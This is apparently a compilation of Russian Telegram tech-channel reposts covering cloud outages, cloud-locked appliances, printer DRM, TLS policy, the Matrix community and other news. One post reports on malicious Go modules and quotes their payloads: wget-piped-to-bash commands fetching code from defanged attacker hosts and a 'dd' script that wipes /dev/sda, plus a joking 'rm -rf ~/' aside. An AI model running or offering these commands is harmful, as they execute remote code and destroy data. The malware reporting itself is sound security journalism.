И этот пост понятно к чему. Сегодня 12 часов валялась обоссавшись и обосравшись зона ru-central1-b в Яндекс.Облаке и вроде как сейчас приходит в более или менее живое состояние. Всем кто в ночи будет чинить свои сервисы мои соболезнования и лучи поддержки.

Но проблема в том, что современные "хипсторы" решили почему-то что облака (не только AWS, GCP и т.д., а в более широком смысле) круто и надёжно, поэтому всё теперь привязывается и создаётся в них. Всё конечно же ради вашего удобства (нет)

И если пост выше это типа юмор (тоже нет), то вот почитайте реальную историю о том как человек не может воспользоваться нормально посудомоечной машиной, потому что ей нужен WiFi и приложение

я решил запустить цикл ополаскивания, но обнаружил, что он, а также другие функции, например, отложенный запуск и экорежим, требуют установки приложения.

Более того, для использования приложения нужно привязать посудомойку к Wi-Fi, настроить облачный аккаунт для какой-то системы под названием Home Connect, и только тогда вы сможете пользоваться всеми функциями машины.
. . .
Приложение? Я бы мог понять наличие удобных функций для тех, кому они нужны. Как в моём новом холодильнике (который я решил не подключать к WiFI): у него есть приложение, позволяющее мониторить температуру внутри или проще искать коды ошибок. Если бы мне нужны были эти дополнительные возможности, которых не было в моём старом холодильнике, то их можно было бы получить.

Но обязательное требование приложения для доступа к функциям, которыми раньше можно было управлять кнопками на самой посудомойке, или по-прежнему можно, если заплатить на 400 долларов больше за «крутую» модель 800? Это печально.
. . .
Что можем сделать мы?

Не думаю, что мы должны прощать подобное производителям.

Во-первых, это позволяет дизайнерам устройств лениться.

Во-вторых, с моей стороны это может показаться какой-то теорией заговора, но мне кажется, это часть запланированного устаревания. Как и в случае с машиной GE, в которой многие детали спроектированы так, чтобы заржаветь спустя пять или десять лет.

Если у вас есть облачное приложение, то для него должен работать облачный сервис. А его поддержка стоит денег.

Абонентской платы пока нет, что означает один из двух вариантов:

Производители уже могут продавать кому-то наши данные.
Рано или поздно они или закроют сервис, потому что это источник затрат (поэтому цикл ополаскивания и экорежим таких посудомоек пропадут, как по мановению волшебной палочки) или они перейдут на модель с подпиской.

В-третьих, это дыра в безопасности вашей локальной сети.

Не буду я подключать посудомойку к вашему дурацкому облаку
https://habr.com/ru/companies/ruvds/articles/894602/

Оригинал
I won't connect my dishwasher to your stupid cloud
https://www.jeffgeerling.com/blog/2025/i-wont-connect-my-dishwasher-your-stupid-cloud

Если что, то Jeff Geerling достаточно известный в узких кругах человек

https://t.iss.one/tech_b0lt_Genona/3810
https://t.iss.one/tech_b0lt_Genona/3814

В целом, наблюдать за всем этим печально, потому что люди ради своего как бы удобства, перестают владеть не только купленным софтом (в самом широком смысле), но теперь уже и железом. Более того, радостно продолжают голосовать за это рублём.

_______
Источник | #tech_b0lt_Genona
________________________________

Это ебануться

А есть кто на канале из админов https://t.iss.one/yandexcloud_chat? Можно пожалуйста бан снять с @rusdacent?

Я в вашем официальном чате дал человеку ссылку на ваш же официальный канал с алертами (https://t.iss.one/yandexcloudalerts) и меня забанил ваш же бот.

_______
Источник | #tech_b0lt_Genona

#хроникицифровизации
@F_S_C_P

При обсуждении под постом https://t.iss.one/tech_b0lt_Genona/5163 я вспомнил, что хотел написать на похожую тематику ранее, но как-то замотался и забыл

Я не зря там написал последний абзац

В целом, наблюдать за всем этим печально, потому что люди ради своего как бы удобства, перестают владеть не только купленным софтом (в самом широком смысле), но теперь уже и железом. Более того, радостно продолжают голосовать за это рублём.

Раньше так же было сложно представить ситуацию с принтерами, как в посте с посудомоечной машиной, но прошло время и мы в моменте, когда чуть ли уже не последний крупный производитель принтеров залез в "очко".

Brother начал блокировать картриджи сторонних производителей после принудительного обновления прошивки принтеров. Также в Brother запустили процесс удаления старых версий прошивок своих принтеров и МФУ с портала техподдержки.
. . .
Россманн признался, что раньше говорил многострадальным владельцам печатающих устройств HP или Canon, столкнувшимся с проблемами DRM картриджей: «Купите лазерный принтер Brother за 100 долларов, и все ваши беды будут решены». Но теперь и Brother пошла по пути HP или Canon.

Brother начал блокировать картриджи сторонних производителей после принудительного обновления прошивки принтеров
https://habr.com/ru/news/888020/

Оригинал
Brother accused of locking down third-party printer ink cartridges via forced firmware updates, removing older firmware versions from support portals
https://www.tomshardware.com/peripherals/printers/brother-accused-of-locking-down-third-party-printer-ink-cartridges-via-firmware-updates-removing-older-firmware-versions-from-support-portals

И это ещё половина проблемы. Софт, который "вставляет палки в колёса", ещё и ломает ваше "железо"

Американская компания HP Inc. окончательно «убила» свои принтеры и многофункциональные устройства (МФУ). Как пишет портал Ars Technica, она выпустила прошивку, которая не дает печатать даже на принтерах, в которых установлены оригинальные расходные материалы.

Опасная прошивка имеет номер 20250209 и ряд устройств, в том числе LaserJet MFP M232-M237 она превращает в «кирпич». Точное количество моделей, которых зацепила проблема, пока не установлено.

Принтеры и МФУ отказываются печатать, даже если установить в них только что купленный оригинальный картридж. Они выдают ошибку с кодом 11. Пользователи начали жаловаться на проблему, притом как на сторонних ресурсах, так и на официальном форуме HP, однако к моменту публикации материала у HP не было готового ее решения.

HP доигралась. Новая прошивка «окирпичила» ее принтеры, теперь они не работают даже с оригинальными картриджами
https://www.cnews.ru/news/top/2025-03-11_hp_doigralaskrivaya_proshivka

Оригинал
Firmware update bricks HP printers, makes them unable to use HP cartridges
https://arstechnica.com/gadgets/2025/03/firmware-update-bricks-hp-printers-makes-them-unable-to-use-hp-cartridges/

Так что ждём картриджи с моющими средствами без которых ваша посудомойка откажется работать.

ЗЫ С автомобилями такая же ситуация, если не хуже.

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

Узнай судьбу картами Таро:
✨Anna Taro bot

Подробный разбор инцидента от 30 марта в Яндекс Облаке

Что случилось?

В период с 30.03.2025 12:25 по 31.03.2025 00:00 (МСК) сервисы Yandex Cloud, расположенные в зоне ru-central1-b, были недоступны. Инцидент был вызван двойным отказом по питанию из-за сбоя на городской высоковольтной подстанции, питающей ряд областных и промышленных объектов, включая дата-центр Яндекса.
. . .
Предотвращение

Корневая причина инцидента – потеря напряжения на двух независимых источниках питания одновременно. Команда Yandex Cloud анализирует возможные варианты предотвращения этого риска (включая вариант добавления третьего независимого источника питания). Об итоговом решении мы сообщим дополнительно.

Резюме по инциденту
https://status.yandex.cloud/ru/incidents/1129

_______
Источник | #tech_b0lt_Genona

———
очень интересно как объект получил tier1 если там принципиально нет ДГУ ...

———
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Когда я сделал недавно серию постов про "железо", которое не ваше я же не шутил, а обозначил вполне конкретную проблему и будущее в которое не хотелось бы двигаться, но мы в него движемся

https://t.iss.one/tech_b0lt_Genona/5163
https://t.iss.one/tech_b0lt_Genona/5166
https://t.iss.one/tech_b0lt_Genona/5195 (почему-то многие подумали, что про "облачные" кондиционеры я придумал, нет это реальный производитель с реальными кондиционерами)

Оцените ход Nintendo

Теперь вы покупаете приставку и контроллер, в который по умолчанию встроена кнопка для рекламы. С выходом Nintendo Switch 2 компания решила внедрить кое-что новое — кнопку C, которая активирует встроенный голосовой чат, показ экрана и даже возможность стримить с веб-камерой прямо с консоли. Прорыв? Почти, только в другой части.

Как выяснилось, использовать эти функции бесплатно можно будет только до 31 марта 2026 года. После этого доступ к C-кнопке потребует подписки на Nintendo Switch Online — минимум $20 в год (на текущий момент). Без нее кнопка на корпусе консоли превращается в ссылку на рекламу платного сервиса.
. . .
Представитель Nintendo Билл Тринен в интервью Polygon подтвердил: «Если вы нажмете кнопку без подписки, вы узнаете о преимуществах NSO». То есть, чтобы воспользоваться функцией на консоли за $450, вы должны доплатить, чтобы она вообще работала.

Кнопка для рекламы. Nintendo объяснила работу кнопки «С» в контроллере Switch 2 без активной подписки
https://gameguru.ru/publication/knopka-dlya-reklamy-nintendo-obyasnila-rabotu-knopki-s-v-kontrollere-switch-2-bez-aktivnoj-podpiski/

Оригинал
Nintendo confirms you'll have to pay a monthly or yearly fee to use the Switch 2's C button once the free trial period is up
https://www.gamesradar.com/platforms/nintendo-switch-2/nintendo-confirms-youll-have-to-pay-a-monthly-or-yearly-fee-to-use-the-switch-2s-c-button-once-the-free-trial-period-is-up/

_______
Источник | #tech_b0lt_Genona

Зачем эти полумеры? Надо ставить 1 день, а потом двигаться к новому сертификату на каждый коннект

Участники ассоциации CA/Browser Forum, являющейся площадкой для координации совместной работы производителей браузеров и удостоверяющих центров, проголосовали за сокращение максимального времени жизни TLS-сертификатов. Максимальное время действия TLS-сертификатов будет сокращено с 398 до 47 дней, если в дальнейшем CA/Browser Forum не пересмотрит принятое решение.
. . .
Изменение намерены продвигать постепенно: начиная с 15 марта 2026 года максимальный срок действия TLS-сертификатов будет уменьшен до 250 дней, с 15 марта 2027 года - до 100 дней, а с марта 2029 года - до 47 дней.
. . .
За новое сокращение времени жизни TLS-сертификатов проголосовали 29 участников, 6 воздержались и никто не отдал голос против. Участники, проголосовавшие "за": Apple, Google, Microsoft, Mozilla, Amazon, Asseco Data Systems SA (Certum), Buypass AS, Certigna (DHIMYOTIS), Certinomis, DigiCert, Disig, D-TRUST, eMudhra, Fastly, GlobalSign, GoDaddy, HARICA, iTrusChina, Izenpe, NAVER Cloud Trust Services, OISTE Foundation, Sectigo, SHECA, SSL.com, SwissSign, Telia Company, TrustAsia, VikingCloud, Visa. Участники, которые воздержались: Entrust, IdenTrust, Japan Registry Services, SECOM Trust Systems, TWCA.
. . .
Предполагается, что генерация короткодействующих сертификатов позволит быстрее внедрять новые криптоалгоритмы в случае выявления уязвимостей в ныне действующих, а также сократит угрозы безопасности. 
. . .
Кроме того, короткодействующие сертификаты станут стимулом для внедрения автоматических систем управления сертификатами, избавленными от человеческого фактора. При этом, изжитие практики ручного обновления сертификатов может привести и к негативным последствиям. Отмечается, что некоторые устройства, допускающие загрузку сертификатов только в ручном режиме, могут остаться с недействительными сертификатами из-за сложности организации ручного обновления каждые полтора месяца. Изменение также может негативно повлиять на бизнес удостоверяющих центров, не предоставляющих API для автоматического получения сертификатов.

Максимальное время жизни TLS-сертификатов сократят с 398 до 47 дней
https://www.opennet.ru/opennews/art.shtml?num=63069

Оригинал
https://mstdn.social/@jschauma/114325519681641946

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

-------
Поддержи канал подпиской
-------

Очень люблю такие новости

Код HACL* написан на подмножестве функционального языка F*, предлагающем систему зависимых типов и уточнений, позволяющих задавать точные спецификации (математическую модель) и гарантировать отсутствие ошибок в реализации при помощи SMT-формул и вспомогательных инструментов доказательства. Эталонный код на F* транслируется в код на языке Си при помощи компилятора KaRaMeL и доступен для интеграции с другими проектами.
. . .
Проведение верификации подразумевает определение подробных спецификаций, описывающих все варианты поведения программы, и формирование математического доказательства, что написанный код полностью соответствует подготовленным спецификациям. Верификация даёт гарантию, что программа будет выполняться только как задумали разработчики и в ней отсутствуют определённые классы ошибок, такие как переполнение буфера, разыменование указателей, обращение к уже освобождённым областям памяти или двойное освобождение блоков памяти. В процессе компиляции обеспечивается жёсткая проверка типов и значений - один компонент никогда не передаст другому компоненту параметры, не соответствующие спецификации, и не получит доступ ко внутренним состояниям других компонентов.

В Python задействованы криптофункции с математическим доказательством надёжности
https://www.opennet.ru/opennews/art.shtml?num=63104

Оригинал
15,000 lines of verified cryptography now in Python
https://jonathan.protzenko.fr/2025/04/18/python.html

Вообще, эта задача реально сложная для более или менее крупного проекта

> Работа по переходу на функции с математическим доказательством надёжности велась с 2022 года и была инициирован после выявления переполнения буфера в реализации алгоритма SHA3, используемой в Python-модуле hashlib.

> Процесс перехода на верифицированный код занял два с половиной года и потребовал доработки библиотеки HACL*, функциональность которой была расширена возможностями, необходимыми для прозрачной замены имеющейся функциональности hashlib.

Самый крупный известный мне проект в котором было подобное - seL4 (https://github.com/seL4). Это микроядро для которого было проведено доказательство корректности, что в свою очередь гарантировало отсутствие переполнения буфера, дедлоков и т.д. и т.п. Там, кстати, Haskell использовали для проведения доказательства.

Вот whitepaper, где достаточно компактно рассказано, что да как
The seL4 Microkernel - An Introduction
https://sel4.systems/About/seL4-whitepaper.pdf

Если кому-то интересно, то могу посоветовать статью (она правда от 2018 года, но читается легко)
Formally Verified Software in the Real World
https://cacm.acm.org/research/formally-verified-software-in-the-real-world/

Перевод на Хабре
Микроядро seL4. Формальная верификация программ в реальном мире
https://habr.com/ru/articles/437406/

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Тут произошла ДРАМА в камунити Matrix

Все, кто админил Matrix, а именно его наиболее известную имплементацию Synapse (https://github.com/element-hq/synapse/), тот знает, что это страшное поделие, которое жрёт кучу ресурсов.

Когда вы читает в доке At least 1GB of free RAM if you want to join large public rooms like #matrix:matrix.org, то не верьте этому (https://element-hq.github.io/synapse/latest/setup/installation.html)

Естественно, стали появляться другие реализации, в том числе на Rust (оригинальный написан на Python)

Одним из таких проектов стал Conduwuit
https://github.com/girlbossceo/conduwuit

И вот основатель проекта сгорел

conduwuit was on track, and arguably already was, to being the best actively maintained synapse alternative. the success of conduwuit stemmed primarily from my co-maintainer Jason, who i have had noticeably rough times collaborating with but overall still stuck together until yesterday.

yet, since creating conduwuit, over the past 12 months i have had nothing but constant abuse and retaliation and toxicity from all kinds of people across matrix, and none of these people getting repercussions because the world of matrix is incredibly small and they all talk to eachother and participate in eachother's rooms and activities towards me
. . .
and my ambitions for matrix are too high and my project is a threat to taking over synapse and killing all other homeserver implementations
. . .
over the past 12 months, i have faced and still am facing:
- fake security vulnerabilities made up and posted on fediverse to attack me and my project, by queer folks
- false accusations of "withholding security vulnerabilities" on fediverse and matrix
- a highly falsified and libeled document about me that has been primarily passed around the nix community, including by folks who are quite high up involved in nix, to drive away conduwuit users or potential ones, including even posting it in my own rooms, and even recurring donators cancelling their donations
- my servers ACL'd and transfem.dev users banned from queer-owned rooms just because the homeserver is conduwuit
- threats of attempting mass defederation just because i dont participate in spec pedantry so conduwuit "is a threat to federation stability"
- baselessly labeled a zoophile, dogfucker, pedophile, etc on fediverse and on matrix, by queer folks
- getting posted on 4chan, kiwifarms and harassed by those users
- attempts at trying to take control of my project or trying to strong-arm it into a way i dont agree with, primarily by the "rustaceans"
- harassed by docker users and nix users for failing to ensure "stability", "maintainability", better tagging, more frequent stable releases, and other completely minute and miniscule things that are not relevant to focus or worry about
- transfem.dev ddosed, mass-spam registrations, forced to block tor exit nodes and VPNs
- copyright trolls demanding i delete all their commits from conduwuit or face legal action
- an attempt at harassing my previous employer
- demands i ban my primary co-maintainer and being given falsified evidence or opinions of their "actions towards matrix"

Полностью тут
https://girlboss.ceo/~strawberry/conduwuit.txt

На самом деле камунити вокруг Matrix, а точнее альтернативные реализации, будто проклято. Почитать про все срачи можно тут (я орал)
Problems with Matrix homeserver implementations
https://hedgedoc.computer.surgery/s/qMd17DXxP

А теперь немного про проекты

https://gitlab.com/famedly/conduit - известная реализация. Автор замешан в срачах.

https://github.com/matrix-construct/tuwunel - позволяет переехать с закрывшегося Conduwuit, но нельзя с Conduit и Synapse. Автор замешан в срачах и помогал пилить Conduwuit.

https://gitlab.computer.surgery/matrix/grapev
{...продолжить в источнике}

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Пятница! (давненько не было, конечно)

Игра сделана на SQL полностью, включая ИИ врагов, рендеринг, 3D raycasting и т.д.

How It Works
The game uses SQL in interesting ways:

- 3D Rendering: Uses recursive CTEs to implement raycasting
- Game state: Stored in tables (player, enemies, bullets, map)
- Physics: SQL queries handle collision detection and movement
- Rendering: Views transform the 3D world state into ASCII art

A Doom-like game using DuckDB
https://github.com/patricktrainer/duckdb-doom

Почитать подробнее как это работает можно тут
Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)
https://www.hey.earth/posts/duckdb-doom

Запуск происходит в WebAssembly версии DuckDB
https://github.com/duckdb/duckdb-wasm
https://shell.duckdb.org/

За наводку спасибо подписчику

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

-------
Поддержи канал подпиской
-------

Помните я писал про Organic Maps и цирк, который там творится?
https://t.iss.one/tech_b0lt_Genona/5115

И вот продолжение истории. Я всё так же считаю, как и в прошлый раз, что проект накрывается "медным тазом"

Summary

Community contributors to Organic Maps have expressed serious concerns about the project's governance, transparency, and the potential for shareholder profit at the expense of the community. They are calling for a shift to a nonprofit structure, greater inclusivity in decision-making, and financial transparency, and are considering starting a new project if these issues are not addressed.

Preface

This open letter is an almost verbatim copy of the letter composed by some Organic Maps community contributors and sent to the Organic Maps Shareholders via the team's internal channels on March 21, 2025. Each individual shareholder was asked to reply within 7 days.
. . .
This letter's intent is to express our concerns regarding the current Organic Maps project crisis, and to find a path forward that aligns with the project's stated values and the interests of the community. We've collected these common concerns about the project governance that have been building up over the past few years due to a lack of transparency and defined project goals. Many of these concerns have previously been mentioned to you, with little or no dialogue or response.

The Organic Maps project has been built and promoted under the premise of being an open community project, so it's troubling to discover that the majority of shareholders consider it to be their sole property. More concerns include lack of transparency and accountability in project governance and violation of stated Free and Open Source Software values.
. . .
When exploring conflict resolution options, we'd like Shareholders to acknowledge and consider the community's interests. Please share your post-conflict vision of the project's future and the community's role in it.

Полностью всё письмо тут
Open Letter to Organic Maps Shareholders
https://openletter.earth/open-letter-to-organic-maps-shareholders-a0bf770c

Чат для обсуждения открытого письма - @CoMaps_RU
https://fosstodon.org/@CoMaps

Спасибо подписчику за ссылку

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Такое мы любим

Представлен специализированный процессор PyXL, предназначенный для ускорения выполнения кода на языке Python. Байт-код Python напрямую выполняться чипом без JIT, интерпретации и виртуальных машин. Файлы на языке Python вначале транслируются в байт-код CPython, после чего байт-код преобразуется в специализированный набор инструкций PySM, выполняемых чипом. Инструментарий для подготовки кода к выполнению написан на Python и работает в стандартном окружении на базе немодицифированного CPython. Реализация процессора разработана с нуля и оформлена на языке описания и моделирования электронных систем Verilog. Рабочий прототип процессора тестируется на платах с FPGA Zynq-7000.

В проведённых тестах, оценивающих скорость обработки событий GPIO, PyXL опережает решение на базе MicroPython и платы Pyboard в 30 раз. При выполнении тестового кода при помощи реализации PyXL, работающей с тактовой частотой 100MHz, задержка обработки запроса GPIO (Roundtrip Latency) составила 480 нс, а при помощи MicroPython Pyboard (168MHz) - 14741 нс. Предполагается, что повышение тактовой частоты PyXL до уровня Pyboard позволит увеличить разрыв до 50 раз.

Архитектура набора команд процессора PyXL спроектирована с оглядкой на структуру байт-кода CPython и его эффективную обработку на аппаратном уровне с учётом специфики, такой как динамическая обработка типов и динамическая диспетчеризация. ISA включает инструкции для манипуляции стеком, бинарные операции, операции сравнения и ветвления, возможности вызова функций и доступа к памяти.

Проект PyXL развивает процессор для выполнения байт-кода Python
https://www.opennet.ru/opennews/art.shtml?num=63157

Сайт - https://www.runpyxl.com/

Когда-то давно, лет 10 назад, был проект pyCPU, но так и не развился во что-то большое (картинку, как проект работал, я прицепил к посту)

The Python Hardware Processsor (pyCPU)  is a implementation of a Hardware CPU in Myhdl. The CPU can directly execute something very similar to python bytecode (but only a very restricted instruction set). The Programcode for the CPU can therefore be written directly in python (very restricted parts of python). This code is then converted to this restricted python bytecode. Since the hardware description is also in python, the slightly modified bytecode is then automatically loaded into the CPU design.

Most “bytecode” instructions are executed in the Hardware CPU with one instruction per cycle. If you have enought hardware available you can simply instantiate more cores on an FPGA with different Programmcode to make them run in parallel.

https://pycpu.wordpress.com/

_______
Источник | #tech_b0lt_Genona

🙈

Разработчик под ником NSG650 представил тестовый проект по запуску ОС Linux в приложении Excel с помощью макроса VBA.

«Решение использует riscv_emufun (mini-rv32ima). Эмулятор собран как отдельная dll, которая загружается макросом VBA. Макрос VBA вызывает эмулятор в dll, получает вывод и записывает его в ячейки электронной таблицы. Очевидно, что эта штука очень глючная, но я не хотел тратить на неё много времени. Это было сделано в основном ради забавы. Очевидно, что такое решение является читерством, так как я не переписывал эмулятор в формулах VBA или Excel, но, опять же, я хотел запустить Linux в Excel, и это был один из способов сделать это», — пояснил автор проекта.

Представлен проект Linux In Excel через макрос VBA
https://habr.com/ru/news/905744/

GitHub
https://github.com/NSG650/LinuxInExcel

_______
Источник | #tech_b0lt_Genona
#технопорно
@F_S_C_P

-------
Поддержи канал подпиской
-------

Я в марте писал про то, как JetBrains насрали себе в штаны в очередной раз https://t.iss.one/tech_b0lt_Genona/5069.

И вот опять это случилось.

Кто-то там посчитал, что будет круто удалить негативные отзывы на плагин их AI-ассистента

Объяснение от них на 12 из 10: мы удалили потому что отзывы отпугивают новых пользователей, а стало лучше чем было.

—
Thank you for the feedback. Let me please explain what has happened and hopefully address the concerns.

What happened

- We pulled some reviews out.

- Removed reviews were mentioning issues now solved, no matter the rating – bugs that were fixed long time ago or missing functionality that was delivered: e.g. free local LLMs, no forced install, plugin easily disabled.

- There were also few comments that violated the policy: e.g. swearing, etc.

- Negative or positive posts about current behavior stayed up.

Why

- Old complaints mislead new users.

- Some stores just reset ratings on every major update; we haven’t, so we trim outdated stuff instead according to our existing policy.

Could we have done better?

Absolutely. Nuking several reviews at once without a heads-up looked shady. At least, we should’ve posted a notice and provided more details to the authors.

What’s next

- We’ll consider the options to approach this whole case of major updates differently

- Explore per-version reviews or mark reviews as “Resolved” and link to related YouTrack issues instead of deleting.

- Commit to clearer, faster comms in general, and especially whenever we moderate content.

Thanks for holding our feet to the fire – keep the feedback coming!
—
Red Flag: JetBrains removing bad reviews of their AI assistant plugin
https://www.reddit.com/r/Jetbrains/comments/1ka5h3g/red_flag_jetbrains_removing_bad_reviews_of_their/

_______
Источник | #tech_b0lt_Genona

Есть такая старая паста про вирусы и Linux (сейчас менее актуальная)

Скачал вирусов себе на линух.

Распаковал.

Поставил под root.

Не завелись. Два часа гуглил, оказалось, вместо /usr/local/bin вирусы стали в папку /usr/bin на которую у юзера malware нет прав на запись, поэтому вирус не может создать файл процесса. Нашел на китайском сайте патченый .configure и .make, пересобрал, переустановил.

Вирус заявил, что ему необходима библиотека cmalw-lib-2.0. Оказалось cmalw-lib-2.0 идет под CentOS, а под убунту ее не было. Гуглил два часа, нашел инструкцию как собрать .deb пакет либы из исходников. Собрал, поставил, вирус радостно запустился, пискнул в спикер и сделал core dump.

Час чтения syslog показал, что вирус думал, что у меня ext4 и вызывал ее api для шифрования диска. В btrfs это api deprecated поэтому линукс, заметив это непотребство, перевел раздел в рид-онли.

В сердцах открыл исходники вируса, grep'нул bitcoin кошелек, отправил туда $5 из жалости и пошел спать...

Я её вспомнил, когда читал про найденную малварь в пакетах Go

wget to Wipeout: Malicious Go Modules Fetch Destructive Payload
https://socket.dev/blog/wget-to-wipeout-malicious-go-modules-fetch-destructive-payload

Там рассказывают про три Go-модуля нехороших

github[.]com/truthfulpharm/prototransform
github[.]com/blankloggia/go-mcp
github[.]com/steelpoor/tlsproxy

Мало того, что они требуют wget все

# prototransform module payload
wget -O - <https://vanartest>[.]website/storage/de373d0df/a31546bf | /bin/bash &

# go-mcp module payload
wget -O - <https://kaspamirror>[.]icu/storage/de373d0df/a31546bf | /bin/bash &

# tlsproxy module payload
wget -O - <https://147.45.44>[.]41/storage/de373d0df/ccd7b46d | /bin/sh &

Так там ещё и для удаления данных хардкодом используется dd в /dev/sda

#!/bin/bash
dd if=/dev/zero of=/dev/sda bs=1M conv=fsync
sync

очевидно, что хардкод /dev/sda далеко не везде сейчас будет работать. Я уж молчу про то, что под обычным пользователем без предварительной настройки не получится так сделать без прав соответствующих. Вот уж реально, лучше бы rm -rf ~/ прописали и то толку больше было бы.

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

-------
Поддержи канал подпиской
-------

Инго Молнар (Ingo Molnar), мэйнтейнер архитектуры x86, механизма блокировок и планировщика задач в ядре Linux, выставил на обсуждение набор патчей, удаляющих из ядра поддержку процессоров 486 (M486, M486SX, AMD ELAN) и начальных серий процессоров 586. В ядре предлагается оставить только возможность работы с процессорами x86, поддерживающими инструкцию CX8 (CMPXCHG8B) и регистр TSC (Time Stamp Counter), которые появились в CPU Pentium.

Отмечается, что для поддержки CPU 486 в ядре приходится держать код, эмулирующий операции CX8 (сравнить и обменять 8 байт) и TSC (счётчик циклов CPU, используемый в планировщике задач). Подобный код усложняет ядро, затрудняет сопровождение и временами становится источником проблем, разбор которых отнимает время у разработчиков. Прекращение поддержки 486 позволит удалить из ядра 14104 строки кода, что значительно упростит некоторые функции в ядре за счёт исключения прослоек, эмулирующих CX8 и TSC, и позволит избавиться от библиотеки math-emu, эмулирующей FPU.

За день до публикации патчей вопрос целесообразности удаления поддержки 486 поднял Линус Торвальдс при обсуждении очередной проблемы, проявляющейся при эмуляции CX8. Линус считает, что настало время отказаться от поддержки CPU 486 и не видит причин, чтобы продолжать тратить время разработчиков на решение возникающих из-за них проблем. Поддержка процессоров 386 была удалена из ядра в 2012 году. По мнению участников дискуссии, сейчас настало время для удаления поддержки CPU 486. В октябре 2022 года Линус уже публиковал подобное предложение, но оно не получило развития.

Разработчики ядра Linux на пути к удалению поддержки процессоров i486
https://www.opennet.ru/opennews/art.shtml?num=63184

Оригинал
https://lore.kernel.org/lkml/[email protected]/

_______
Источник | #tech_b0lt_Genona

Давайте еще раз вспомним, что поможет нам убить хороший продукт.

- Не тестировать код
Тестирование — это для слабаков! Настоящие разработчики пишут код и надеются на лучшее

- Публиковать релизы в пятницу вечером
Никто не будет работать над исправлениями до понедельника, все хорошенько отдохнут! Суеверия для дураков

- Чрезмерная документация
Напишите столько документации, чтобы пользователи не поняли, зачем они пришли к вашему продукту, а тестировщики забыли что вообще нужно проверить 
Пусть они потратят часы на чтение вместо проверки!

- Использовать устаревшие технологии
Зачем обновлять? Они работали когда-то, значит, будут работать и сейчас

- Игнорировать отзывы пользователей
Зачем слушать тех, кто использует продукт? Это  ведь мы его сделали, значит знаем, что для них лучше

- Обвинять друг друга при любых проблемах на проекте
Потому что гораздо важнее найти крайнего, а не решить проблему

Методы убийства ИТ-продукта: мнение QA-инженера
https://habr.com/ru/companies/magnit/articles/908954/

Хороший пост, без откровений, в целом всё по делу, но глаз у меня зацепился за текст про Telegram

Например, Telegram — не лучшее решение для внутренней корпоративной коммуникации.
Существуют как очевидные проблемы:

- отсутствие SSO (логина через корпоративную учетку)

- слабые возможности по обеспечению безопасности

- невозможность централизованного поиска сотрудников по имени

Так и более тонкие, которые становятся заметны только с опытом:

- отсутствие поддержки внутренних ролей и тегов (команд, гильдий, лидов)

- невозможность задать единые стандарты наименования и организации чатов

- отсутствие глубоких интеграций с другими корпоративными сервисами

- слабая система прав доступа на создание и управление контентом

- неудобная работа с оргструктурой

- отсутствие из коробки набора полезных ботов и автоматизаций

Но, думаю, главный недостаток — невозможность эффективно доносить важную информацию до всей компании. В Telegram невозможно выстроить каналы массовой коммуникации так, чтобы они были одновременно централизованными, структурированными и не утопали в шуме. Универсальный чат на 100+ человек быстро становится бесполезным: уведомления сразу же отключают из-за флуда и хаоса. Результат — бесконечное размножение мелких групп, где каждый раз собирается новый состав и информация теряется. Какой выход? Только искать альтернативы привычному.

И это абсолютная правда. Что бы Телега стала реально рабочим инструментом её надо обмазывать корпоративными ботами, которые будут реализовывать

- Некое подобие SSO, когда бот контролирует кто и в каком чате имеет право находиться опираясь на БД сотрудников в какой-либо системе

- Интеграция с внутренними сервисами по нотификации, организации рабочих чатов, групп и т.д.

- Матчинг id-шников телеги на внутреннюю оргструктуру

- [тут идёт ещё много всякого]

Ввиду всего выше сказанного надо понимать, что боты в среднем под каждую организацию будут уникальные (если не самописные полностью, то форкнутые)

Видел сообщения по чатам, что в некоторых местах сотрудников заставляют использовать в Телеге не ники, а ФИО и ставить реальные фотографии на аватарки. Такое себе решение проблемы, конечно, но, видимо, ничего лучше не придумали.

Всё что я читал, слышал и видел про Телегу, как корпоративный мессенджер, нигде не работало без "изоленты" вокруг неё.

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Пятница!

Есть такое камунити https://buttplug.io/, которое курирует открытые проекты и стандарты игрушек для взрослых (нет, это не тонометры)

И под него сделали MCP (Model Context Protocol) Server

Once set up, you can prompt your LLM:

- "What are my connected buttplug devices?"
- "Set the second motor on my LELO F1S to 50% strength"
- "How much battery is left on my Lovense Max 2?"
- "Does my WeWibe have weak signal?"

https://github.com/ConAcademy/buttplug-mcp

Проект появился как шуточный 1 апреля, собственно, и стабильность поэтому такая же

While it does work, I found the underlying go-buttplug library to be unstable in connection handling. I could ask Claude for my devices, but my specific device wouldn't vibrate even just with just Intiface Central -- it was like in read-only mode! I also wish I had a virtual buttplug.io device for testing, rather than relying on a physical device.

So, it has not truly been tested "end-to-end" 😉

I will dig more into the go-buttplug library and see why connections are unstable. I also need to understand the MCP protocol current state of MCP hosts -- it seems they focus on Tools rather than Resources and Resoure Templates.

Для селфхостинга можно прикрутить Ollama, а ещё можно интегрировать с Home Assistant MCP 🌝

_______
Источник | #tech_b0lt_Genona

https://t.iss.one/rust_beginners_ru/331916

Надеюсь рестарт был в пятницу 🌝

За наводку спасибо подписчику

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

ИИ пишет — мозг молчит: первое исследование с ЭЭГ от MIT доказало, что ChatGPT снижает активность мозга
https://www.ixbt.com/news/2025/06/19/ii-pishet--mozg-molchit-pervoe-issledovanie-s-jejeg-ot-mit-dokazalo-chto-chatgpt-snizhaet-aktivnost-mozga.html

Группа исследователей из MIT Media Lab и нескольких других американских университетов провела первое масштабное исследование, напрямую связавшее использование нейросетей с изменениями в работе мозга и способностью усваивать информацию. Результаты демонстрируют: при написании текстов с помощью ChatGPT мозг активируется заметно слабее, а написанное хуже запоминается. Учёные подчёркивают — речь идёт не просто о корреляции, а о доказанной причинно-следственной связи.

